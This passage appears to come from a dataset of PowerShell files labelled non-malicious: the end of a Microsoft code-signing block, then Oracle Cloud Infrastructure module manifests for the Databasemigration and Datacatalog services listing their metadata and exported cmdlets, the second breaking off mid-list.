// SIG // MzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg
// SIG // U2VydmljZaCCEXgwggcnMIIFD6ADAgECAhMzAAAB5Y9q
// SIG // wPM9tAujAAEAAAHlMA0GCSqGSIb3DQEBCwUAMHwxCzAJ
// SIG // BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
// SIG // DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
// SIG // ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29m
// SIG // dCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTIzMTAxMjE5
// SIG // MDczNVoXDTI1MDExMDE5MDczNVowgdIxCzAJBgNVBAYT
// SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
// SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
// SIG // cG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVs
// SIG // YW5kIE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMd
// SIG // VGhhbGVzIFRTUyBFU046M0JENC00QjgwLTY5QzMxJTAj
// SIG // BgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZp
// SIG // Y2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
// SIG // AQCpe+A62rtjuiy6yTtx8k7zvWl2ov/3jcj+TC1ma5lB
// SIG // jTiTD8DCNPFfcwX0TzXLnK3iGEsiR45DCFBprodKz1ef
// SIG // 9vlAixqzdT++5/X6v5nc1zDdRc6mjx3ShJSp3iUPEenD
// SIG // +Ha7thspprda6xnDXvNNAnA+nfzXaKJppHdfelajrY2R
// SIG // QNV1rvhrBQXlh4ns/z5ZanDP3lp7ZEDLNJStM5gnx/gb
// SIG // u4tYfhQ0UfBe1s1K/+zN44VXT6QH6ts2AgPGVSzYBIs2
// SIG // PrxZoMfsw7rlPxgoQyu5JQ3AsPv4FaBLkjpeXJULMnVk
// SIG // IySV+2dslftSguhtSVaqT93aSjwD/+LnTaqUeRyHm/E2
// SIG // tSX40VM0r96ko3ucvUWE/wI1jWEO4LHs7g1jP/HGddZH
// SIG // KNSb1MjkPMfyQ5DBakkcI9b/pnOiyipY//3Vghvx8Paa
// SIG // XZViV+qbA3rELkEexVe3gqlf5X2o6C6Tzcf/cxdXb/Ml
// SIG // wXc5liT3gontl2kJ6wCg6pRt817sfbTUJs9i/ek3cZyD
// SIG // tjhpmMQQAGQFqCm5rWCPgos+AmMjtBZuWd0+NGuXeyib
// SIG // n7Regk6HHHP1Kf46RX0IrS343e9XEvnCwnqEPqtJ9CAC
// SIG // 71fmnGxDaLkjq47/0LWOBSIx5SOc3ScyZxrJFSeaM4Y4
// SIG // tGEbHL9VsCRQLssgjELy3Zj3XQIDAQABo4IBSTCCAUUw
// SIG // HQYDVR0OBBYEFN//n4e7TXMxInxF5QkIBTl4DIeqMB8G
// SIG // A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
// SIG // A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9z
// SIG // b2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRp
// SIG // bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggr
// SIG // BgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93
// SIG // d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj
// SIG // cm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAo
// SIG // MSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAww
// SIG // CgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqG
// SIG // SIb3DQEBCwUAA4ICAQAz+sIThYw9WnfBpBCfaCwbr345
// SIG // 3TMhkPUeB4ASkpT7d6WtF1S3IpqyZQ5yhoBQYlsCOlzo
// SIG // MPNoXaJQ4jAwSy1kTEyR1lXlGNYFOFwfDjiMQXPf0PN8
// SIG // 29XNEVhLqYAuPCPm/tsdlTYBiVLECMj0dj4l0IU+T8nq
// SIG // zIGoPTkqHUIxcKTXRoq52tq6VdtxFMBXjuft6El+CXgj
// SIG // Wb4MlDsyqcjL6lWrm6PhpX/6bH1ubSHDI2VbdHpbMH6t
// SIG // KiTUIKGIqW2k77+8ZosVCRk24sWIn08AIrz3CjXXorGZ
// SIG // rbbOzh2wDO/eWbyi0hKl4kVIw2Gcnh8gMrDBAC2yIXV4
// SIG // BxIetCqGcs5QV891cRIqxO54bnDcDNrVYjpcCOxJHlOY
// SIG // bnXLZ1whueSbjMP8G+3O9USopmQPyl5VqZgb5CZAdAWR
// SIG // EvDghg3fs2P0/QZ06fLIt+k6pfOFX6WHvYh5suz6qsaj
// SIG // Bdgp+KtmtJhDJ6Qa7gxhP4EfXPElSdp7ZAEcuUn5brif
// SIG // zAetckb09ZlMd5cqaTttnj4wY58KBL1cWw409Y4XTDXX
// SIG // rzrg3iRs0SyvRzZkwwvk3WUJY/lTICJvGXhCETRdKGr4
// SIG // hfkGXFGS1s1m2Kusg6JPBGShYkUeaLQaBi72mBacQWVB
// SIG // PJpyyrg5WKG468Ye5Z8K8Vf3zMtBfX0qNicRZrS4LTCC
// SIG // B3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUw
// SIG // DQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMw
// SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
// SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
// SIG // b24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRp
// SIG // ZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4
// SIG // MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
// SIG // VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
// SIG // B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
// SIG // b3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
// SIG // U3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUA
// SIG // A4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC
// SIG // 0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm
// SIG // 95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNE
// SIG // t6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZT
// SIG // fDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQ
// SIG // HJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5
// SIG // LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVV
// SIG // mG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKy
// SIG // zbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpG
// SIG // dc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2
// SIG // TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZ
// SIG // fD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
// SIG // GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
// SIG // W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLU
// SIG // HMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXb
// SIG // GjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQID
// SIG // AQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAj
// SIG // BgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8v
// SIG // BO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1Gely
// SIG // MFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYI
// SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv
// SIG // bS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNV
// SIG // HSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4K
// SIG // AFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/
// SIG // BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2U
// SIG // kFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8v
// SIG // Y3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0
// SIG // cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
// SIG // KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
// SIG // d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jv
// SIG // b0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0B
// SIG // AQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwU
// SIG // tj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTC
// SIG // j/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+
// SIG // iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhT
// SIG // dSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYS
// SIG // EhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qB
// SIG // woEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0
// SIG // DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxy
// SIG // bxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARx
// SIG // v2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+k
// SIG // KNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2
// SIG // tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4
// SIG // O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
// SIG // jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
// SIG // dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/Z
// SIG // cGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggLUMIIC
// SIG // PQIBATCCAQChgdikgdUwgdIxCzAJBgNVBAYTAlVTMRMw
// SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
// SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
// SIG // b24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w
// SIG // ZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVz
// SIG // IFRTUyBFU046M0JENC00QjgwLTY5QzMxJTAjBgNVBAMT
// SIG // HE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WiIwoB
// SIG // ATAHBgUrDgMCGgMVAPeNohrmBa7BOMM1g3fORKTOkYsK
// SIG // oIGDMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
// SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
// SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG
// SIG // A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
// SIG // MTAwDQYJKoZIhvcNAQEFBQACBQDpkEv+MCIYDzIwMjQw
// SIG // MzA0MjEzMjQ2WhgPMjAyNDAzMDUyMTMyNDZaMHQwOgYK
// SIG // KwYBBAGEWQoEATEsMCowCgIFAOmQS/4CAQAwBwIBAAIC
// SIG // CUowBwIBAAICEU4wCgIFAOmRnX4CAQAwNgYKKwYBBAGE
// SIG // WQoEAjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgCAQACAweh
// SIG // IKEKMAgCAQACAwGGoDANBgkqhkiG9w0BAQUFAAOBgQCc
// SIG // 2PmTyuyzAz14/E6oW73JVXt7gWib5TlG5BFhyaSOmLgj
// SIG // rLB4nRMb0Fv4OTFCZsjEaBJPgD9MlsYJxAwJwx3p5vhS
// SIG // 9wD2//YxbXeQKtE8r/sLGRvPN3WLVWFsxYgdwJhlHh3N
// SIG // wKYhFoLH7VkypfXuwcwoXL+eWuKvSZ26Jls99TGCBA0w
// SIG // ggQJAgEBMIGTMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
// SIG // EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w
// SIG // HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAk
// SIG // BgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAy
// SIG // MDEwAhMzAAAB5Y9qwPM9tAujAAEAAAHlMA0GCWCGSAFl
// SIG // AwQCAQUAoIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcN
// SIG // AQkQAQQwLwYJKoZIhvcNAQkEMSIEIK6AFdv8DwnsbKZ4
// SIG // JLjmRm//miUTkod4HUfyrN7+QuICMIH6BgsqhkiG9w0B
// SIG // CRACLzGB6jCB5zCB5DCBvQQgFanT//6o8RhYXtmG6BF3
// SIG // m/CP6QKH9NQsIW8VB/VOve0wgZgwgYCkfjB8MQswCQYD
// SIG // VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G
// SIG // A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0
// SIG // IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg
// SIG // VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeWPasDzPbQL
// SIG // owABAAAB5TAiBCAJSm/a2IgL1tX2bl84lZQ8OlRIA9wB
// SIG // s53k61Pax29UZzANBgkqhkiG9w0BAQsFAASCAgByNf84
// SIG // rGSVGZWuVUDLCIDRc1XZxrjB+qTGZXnf1gk7DOyetu4z
// SIG // zcUnUX2V1R4LyHRIwOM5G+qZjJ/UAZsf7WT5Fl5NPU4R
// SIG // QvrDTq0Jguc7diPwZqcqisKtbhpu4vOzw3lwPD/GMtYH
// SIG // B4Dq8RdgYleapNRGAJybVVUuP2nveIwvuKiXdrW6jClM
// SIG // CpCkWzDuHoTMLrexaReUVhaT0sQ3L3iga1dAc4DvmAUJ
// SIG // PU5g6UYvYXMy6P6k7aI4HSMDu7anePzRGLrNgVLhjEWd
// SIG // 7vFVIRxiR/ZcxzKQjUepEaH8GcWqwQqg3Bur5dVqZmpr
// SIG // XsyxeRTEEHrwu1J5kmy7kSlB8YPLoYKu1aKeykrkIleu
// SIG // 3CtaE3FHjc32o/GCnGXvqKNSgh26npuMCC00NeKUGYyP
// SIG // Uyj7m8IxM1KbCOds2MBHWLeuJ2GnrxEiGd+9n8yyHzi5
// SIG // sPuYmBoM+Tgqf9gU0N7KJse9yrpvyuY1YCA0CoJb7/0h
// SIG // S2iZnru9clU8t9Kji5ZPL1FxiHMTnRVmLZwjt9knO+AP
// SIG // 3LYGsWCXng5Et13Zzyb2cWmOazqdsylNkkSIjLXEwvIf
// SIG // +g6rrs5JEJfoKC8y6kjXeJoyOfYDZWkwt7OQpUmPv1vH
// SIG // gC1RvpjktgIoKHSok2lUQH9fR6QRJou+M5m6JLuhQBuA
// SIG // S2Rq3k9ycFusewFHMw==
// SIG // End signature block
|
combined_dataset/train/non-malicious/sample_37_82.ps1
|
sample_37_82.ps1
|
#
# Module manifest for module 'OCI.PSModules.Databasemigration'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Databasemigration.dll'
# Version number of this module.
ModuleVersion = '83.2.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '75c40824-63ca-4f44-8abc-b6d5cb895ad8'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Databasemigration Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.2.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Databasemigration.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCIDatabasemigrationMigrationObjects',
'Connect-OCIDatabasemigrationionDiagnostics',
'Get-OCIDatabasemigrationAdvisorReport',
'Get-OCIDatabasemigrationAgent',
'Get-OCIDatabasemigrationAgentImagesList',
'Get-OCIDatabasemigrationAgentsList',
'Get-OCIDatabasemigrationConnection',
'Get-OCIDatabasemigrationConnectionsList',
'Get-OCIDatabasemigrationExcludedObjectsList',
'Get-OCIDatabasemigrationJob',
'Get-OCIDatabasemigrationJobOutputContent',
'Get-OCIDatabasemigrationJobOutputsList',
'Get-OCIDatabasemigrationJobsList',
'Get-OCIDatabasemigrationMigration',
'Get-OCIDatabasemigrationMigrationObjectsList',
'Get-OCIDatabasemigrationMigrationObjectTypesList',
'Get-OCIDatabasemigrationMigrationsList',
'Get-OCIDatabasemigrationWorkRequest',
'Get-OCIDatabasemigrationWorkRequestErrorsList',
'Get-OCIDatabasemigrationWorkRequestLogsList',
'Get-OCIDatabasemigrationWorkRequestsList',
'Invoke-OCIDatabasemigrationCloneMigration',
'Invoke-OCIDatabasemigrationEvaluateMigration',
'Invoke-OCIDatabasemigrationResumeJob',
'Invoke-OCIDatabasemigrationRetrieveSupportedPhases',
'Move-OCIDatabasemigrationAgentCompartment',
'Move-OCIDatabasemigrationConnectionCompartment',
'Move-OCIDatabasemigrationMigrationCompartment',
'New-OCIDatabasemigrationConnection',
'New-OCIDatabasemigrationMigration',
'Remove-OCIDatabasemigrationAgent',
'Remove-OCIDatabasemigrationConnection',
'Remove-OCIDatabasemigrationJob',
'Remove-OCIDatabasemigrationMigration',
'Remove-OCIDatabasemigrationMigrationObjects',
'Start-OCIDatabasemigrationMigration',
'Stop-OCIDatabasemigrationJob', 'Update-OCIDatabasemigrationAgent',
'Update-OCIDatabasemigrationConnection',
'Update-OCIDatabasemigrationJob',
'Update-OCIDatabasemigrationMigration'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Databasemigration'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_59_55.ps1
|
sample_59_55.ps1
|
#
# Module manifest for module 'OCI.PSModules.Datacatalog'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Datacatalog.dll'
# Version number of this module.
ModuleVersion = '84.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'f0444859-1d26-4a2d-8bcd-5551939e4f94'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Datacatalog Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '84.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Datacatalog.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCIDatacatalogCatalogLock',
'Add-OCIDatacatalogCatalogPrivateEndpointLock',
'Add-OCIDatacatalogDataSelectorPatterns',
'Add-OCIDatacatalogMetastoreLock',
'Confirm-OCIDatacatalogConnection', 'Confirm-OCIDatacatalogPattern',
'DisMount-OCIDatacatalogCatalogPrivateEndpoint',
'Export-OCIDatacatalogGlossary',
'Get-OCIDatacatalogAggregatedPhysicalEntitiesList',
'Get-OCIDatacatalogAttribute', 'Get-OCIDatacatalogAttributesList',
'Get-OCIDatacatalogAttributeTag',
'Get-OCIDatacatalogAttributeTagsList', 'Get-OCIDatacatalogCatalog',
'Get-OCIDatacatalogCatalogPrivateEndpoint',
'Get-OCIDatacatalogCatalogPrivateEndpointsList',
'Get-OCIDatacatalogCatalogsList', 'Get-OCIDatacatalogConnection',
'Get-OCIDatacatalogConnectionsList',
'Get-OCIDatacatalogCustomPropertiesList',
'Get-OCIDatacatalogCustomProperty', 'Get-OCIDatacatalogDataAsset',
'Get-OCIDatacatalogDataAssetsList',
'Get-OCIDatacatalogDataAssetTag',
'Get-OCIDatacatalogDataAssetTagsList',
'Get-OCIDatacatalogDerivedLogicalEntitiesList',
'Get-OCIDatacatalogEntitiesList', 'Get-OCIDatacatalogEntity',
'Get-OCIDatacatalogEntityTag', 'Get-OCIDatacatalogEntityTagsList',
'Get-OCIDatacatalogFolder', 'Get-OCIDatacatalogFoldersList',
'Get-OCIDatacatalogFolderTag', 'Get-OCIDatacatalogFolderTagsList',
'Get-OCIDatacatalogGlossariesList', 'Get-OCIDatacatalogGlossary',
'Get-OCIDatacatalogJob', 'Get-OCIDatacatalogJobDefinition',
'Get-OCIDatacatalogJobDefinitionsList',
'Get-OCIDatacatalogJobExecution',
'Get-OCIDatacatalogJobExecutionsList', 'Get-OCIDatacatalogJobLog',
'Get-OCIDatacatalogJobLogsList', 'Get-OCIDatacatalogJobMetrics',
'Get-OCIDatacatalogJobMetricsList', 'Get-OCIDatacatalogJobsList',
'Get-OCIDatacatalogMetastore', 'Get-OCIDatacatalogMetastoresList',
'Get-OCIDatacatalogNamespace', 'Get-OCIDatacatalogNamespacesList',
'Get-OCIDatacatalogPattern', 'Get-OCIDatacatalogPatternsList',
'Get-OCIDatacatalogRulesList', 'Get-OCIDatacatalogTagsList',
'Get-OCIDatacatalogTerm', 'Get-OCIDatacatalogTermRelationship',
'Get-OCIDatacatalogTermRelationshipsList',
'Get-OCIDatacatalogTermsList', 'Get-OCIDatacatalogType',
'Get-OCIDatacatalogTypesList', 'Get-OCIDatacatalogWorkRequest',
'Get-OCIDatacatalogWorkRequestErrorsList',
'Get-OCIDatacatalogWorkRequestLogsList',
'Get-OCIDatacatalogWorkRequestsList',
'Import-OCIDatacatalogConnection', 'Import-OCIDatacatalogDataAsset',
'Import-OCIDatacatalogGlossary', 'Import-OCIDatacatalogLineage',
'Invoke-OCIDatacatalogAssociateCustomProperty',
'Invoke-OCIDatacatalogAsynchronousExportDataAsset',
'Invoke-OCIDatacatalogAsynchronousExportGlossary',
'Invoke-OCIDatacatalogDisassociateCustomProperty',
'Invoke-OCIDatacatalogExpandTreeForGlossary',
'Invoke-OCIDatacatalogFetchEntityLineage',
'Invoke-OCIDatacatalogObjectStats',
'Invoke-OCIDatacatalogParseConnection',
'Invoke-OCIDatacatalogProcessRecommendation',
'Invoke-OCIDatacatalogRecommendations',
'Invoke-OCIDatacatalogSearchCriteria',
'Invoke-OCIDatacatalogSuggestMatches',
'Invoke-OCIDatacatalogSynchronousExportDataAsset',
'Invoke-OCIDatacatalogTestConnection', 'Invoke-OCIDatacatalogUsers',
'Mount-OCIDatacatalogCatalogPrivateEndpoint',
'Move-OCIDatacatalogCatalogCompartment',
'Move-OCIDatacatalogCatalogPrivateEndpointCompartment',
'Move-OCIDatacatalogMetastoreCompartment',
'New-OCIDatacatalogAttribute', 'New-OCIDatacatalogAttributeTag',
'New-OCIDatacatalogCatalog',
'New-OCIDatacatalogCatalogPrivateEndpoint',
'New-OCIDatacatalogConnection', 'New-OCIDatacatalogCustomProperty',
'New-OCIDatacatalogDataAsset', 'New-OCIDatacatalogDataAssetTag',
'New-OCIDatacatalogEntity', 'New-OCIDatacatalogEntityTag',
'New-OCIDatacatalogFolder', 'New-OCIDatacatalogFolderTag',
'New-OCIDatacatalogGlossary', 'New-OCIDatacatalogJob',
'New-OCIDatacatalogJobDefinition', 'New-OCIDatacatalogJobExecution',
'New-OCIDatacatalogMetastore', 'New-OCIDatacatalogNamespace',
'New-OCIDatacatalogPattern', 'New-OCIDatacatalogTerm',
'New-OCIDatacatalogTermRelationship',
'Remove-OCIDatacatalogAttribute',
'Remove-OCIDatacatalogAttributeTag', 'Remove-OCIDatacatalogCatalog',
'Remove-OCIDatacatalogCatalogLock',
'Remove-OCIDatacatalogCatalogPrivateEndpoint',
'Remove-OCIDatacatalogCatalogPrivateEndpointLock',
'Remove-OCIDatacatalogConnection',
'Remove-OCIDatacatalogCustomProperty',
'Remove-OCIDatacatalogDataAsset',
'Remove-OCIDatacatalogDataAssetTag',
'Remove-OCIDatacatalogDataSelectorPatterns',
'Remove-OCIDatacatalogEntity', 'Remove-OCIDatacatalogEntityTag',
'Remove-OCIDatacatalogFolder', 'Remove-OCIDatacatalogFolderTag',
'Remove-OCIDatacatalogGlossary', 'Remove-OCIDatacatalogJob',
'Remove-OCIDatacatalogJobDefinition',
'Remove-OCIDatacatalogMetastore',
'Remove-OCIDatacatalogMetastoreLock',
'Remove-OCIDatacatalogNamespace', 'Remove-OCIDatacatalogPattern',
'Remove-OCIDatacatalogTerm',
'Remove-OCIDatacatalogTermRelationship',
'Update-OCIDatacatalogAttribute', 'Update-OCIDatacatalogCatalog',
'Update-OCIDatacatalogCatalogPrivateEndpoint',
'Update-OCIDatacatalogConnection',
'Update-OCIDatacatalogCustomProperty',
